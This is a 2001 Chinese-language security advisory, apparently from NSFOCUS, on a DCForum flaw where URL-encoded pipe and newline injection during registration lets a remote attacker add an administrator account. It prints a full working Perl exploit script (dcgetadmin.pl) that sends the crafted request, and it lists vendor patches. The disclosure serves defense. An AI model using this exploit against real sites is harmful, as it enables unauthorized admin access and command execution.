首页 -> 安全研究
安全研究
安全漏洞
DCForum远程可获得管理权限漏洞
发布日期:2001-05-08
更新日期:2001-05-08
受影响系统:
DC Scripts DCForum 6.0描述:
DC Scripts DCForum 2000 1.0
BUGTRAQ ID: 2728
DCForum是一种基于WEB的会议系统,设计用于在线讨论。它是用Perl实现的,几乎没有系统相关性,可以运行于Linux、Windows以及绝大多数Unix变体上。
一些版本的DCForum存在漏洞,远程攻击者可以利用这个漏洞获得DCForum的管理权限甚至执行任意命令。
DCForum维护着一个文件包含用户账号信息,包含用户口令的哈希值和其它敏感信息。当建立一个新账号的适合,用户信息会被写入这个文件,一个用户信息一行,每一项记录用管道符('|')隔开。DCForum对用户输入的信息检查不严,攻击者可以在用户信息最后一项的最后输入URL编码的管道符和换行符就可以在后面再任意添加用户到用户信息文件,攻击者可以指定管理权限。
DCForum有管理权限的账号可能以Web服务器的权限执行任意命令。
<*来源:Franklin DeMatto (franklin@qDefense.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=98999386816145&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com
use Getopt::Std;
use IO::Socket;
getopts ('ap');
usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }
$host = $ARGV[0];
$uri = $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';
$username = 'evilhacker' . ( int rand(9899) + 100);
$password = int rand (9899) + 100;
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100) ;
$dummypass = int rand (9899) + 100;
print "\n(Debugging info: Hash = $hash Dummyuser = $dummyuser Dummypass =
$dummypass)\n";
print "Attempting to register username $username with password $password as admin . . .\n";
$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";
$req = "GET
$uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass";
$req .=
"&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";
print $sock $req;
print "The server replied:\n\n";
while (<$sock>)
{
if (/BODY/) { $in_body = 1; }
next unless $in_body;
if (/form|<\/BODY>/) { last; }
s/<.+?>//g;
print $_ unless (/^\s*$/);
}
print "\nNote: Even if your password is supposed to be e-mailed to you, it should work
right away.\n";
sub usage
{
print <<EOF;
dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin\@qDefense.com
Usage: $0 [options] host [path to dcboard.cgi]
Options:
-a to activate the account (for sites that do not activate automatically)
NOTE: This option is not yet supported, but should be quite easy to add if you need it
-p to leave the password in plaintext (necessary when the target is NT)
The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi
EOF
exit 1;
}
建议:
厂商补丁:
DC Scripts
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
DC Scripts DCForum 2000 1.0:
DC Scripts Patch 2000 auth_lib_2_dcf2000.zip
http://www.dcscripts.com/FAQ/auth_lib_2_dcf2000.zip
DC Scripts DCForum 6.0:
DC Scripts Patch 6.0 auth_lib_2_dcf6.zip
http://www.dcscripts.com/FAQ/auth_lib_2_dcf6.zip
浏览次数:3403
严重程度:0(网友投票)
绿盟科技给您安全的保障